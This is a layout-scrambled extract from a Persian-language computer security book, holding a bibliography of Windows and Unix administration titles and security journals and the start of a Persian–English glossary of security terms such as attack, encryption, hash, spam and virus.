: ﺭﺍ ﻓﺮﺍ ﺑﮕﻴﺮﻧﺪUnix ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺩﺭ ﻣﺤﻴﻂ Simon & Schuster, 1987.
Windows NT TCP/IP Network Administration Bolsky, Morris I., and David G. Korn. The
(Craig Hunt and RobertBruce Thompson, 1998). New Kornshell Command and Programming
Language. Englewood Cliffs, NJ: Prentice-
Managing the Windows 2000 Registry Hall, 2nd edition, 1995.
(Robichaux, 2000).
ﻭUnix ﻳﻚ ﺭﺍﻫﻨﻤﺎﻱ ﺧﻮﺏ ﺩﺭ ﻣﻮﺭﺩ ﺭﻭﺡ ﻛﻠﻲ ﺳﻴﺴﺘﻢﻋﺎﻣـﻞ
DHCP for Windows 2000 (Neall Alcott, 2001). ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﭘﻮﺳـﺘﻪ ﻭ،ﺍﻳﻨﻜﻪ ﭼﮕﻮﻧـﻪ ﻣـﻲﺗـﻮﺍﻥ ﺩﺭ ﺁﻥ
DNS on Windows 2000, 2nd Edition (Matt :ﻣﺤﻴﻂﻫﺎﻱ ﺩﺳﺘﻮﺭﻧﻮﻳﺴﻲ ﺭﺍ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ
Larson and Cricket Liu, 2001).
Kernighan, Brian, Dennis Ritchie and Rob
Windows 2000 Administration in a Nutshell Pike. The UNIX Programming Environment.
(Mitch Tulloch, 2001). Englewood Cliffs, NJ: Prentice-Hall, 1984.
:ﻭ ﻧﻬﺎﻳﺘﹰﺎ ﻳﻚ ﻣﺮﺟﻊ ﺑﺴﻴﺎﺭ ﺧـﻮﺏ ﺩﺭ ﻣـﻮﺭﺩ ﻣﺰﺍﻳـﺎ ﻭ ﻣﻌﺎﻳـﺐ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺣـﺎﻭﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺭ ﻣـﻮﺭﺩ.Unix ﺳﻴﺴﺘﻢﻋﺎﻣﻞ
Windows Server 2003 in a Nutshell (Mitch
Tulloch, 2003).
ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ، ﺍﻓﺰﻭﺩﻥ ﻭ ﺣﺬﻑ ﻛـﺎﺭﺑﺮﺍﻥ،ﻧﺤﻮﺓ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴﺴﺘﻢ
ﺗﻬﻴﺔ ﻧـﺴﺨﻪﻫـﺎﻱ،ﺳﻴﺴﺘﻢ ﺣﺴﺎﺑﺪﺍﺭﻱ ﺑﺮﺍﻱ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ
ﮔﺎﻫﻨﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﻧﻴـﺰsendmail ﺭﺍﻩ ﺍﻧـﺪﺍﺯﻱ، ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷـﺒﻜﻪﻫـﺎ،ﭘﺸﻴﺒﺎﻥ
:ﻼ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮ ﺍﺳﺖ ﻭ ﺧﻮﺍﻧﺪﻥ ﺁﻥ ﻛﺎﻣ ﹰ
Computer Audit Update
Computer Fraud & Security Update
Computer Law & Security Report Nemeth, Evi, Garth Snyder, Scott Seebass,
Computers & Security and Trent R. Hein. UNIX System
Administration Handbook, 3rd Edition.
ﺑﺨﺶ ﺷﺸﻢ
PO Box 510110
St. Louis, MO 63151
ﻟﻐﺎﺕ ﻭ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍﻳﺞ ﺍﻣﻨﻴﺘﻲ
Attack ..............................................................................................................................ﺗﻬﺎﺟﻢ
ﮐﺪﮔﺬﺍﺭﻱEncoding ..................................................................................................................
ﺭﻣﺰﮔﺬﺍﺭﻱEncryption ...............................................................................................................
ﺩﺭﻫﻢﺳﺎﺯﻱHash ........................................................................................................................
Services .........................................................................................................................ﺧﺪﻣﺎﺕ
Spam .............................................................................................................................ﻫﺮﺯﻧﺎﻣﻪ
Virus ...............................................................................................................................ﻭﻳﺮﻭﺱ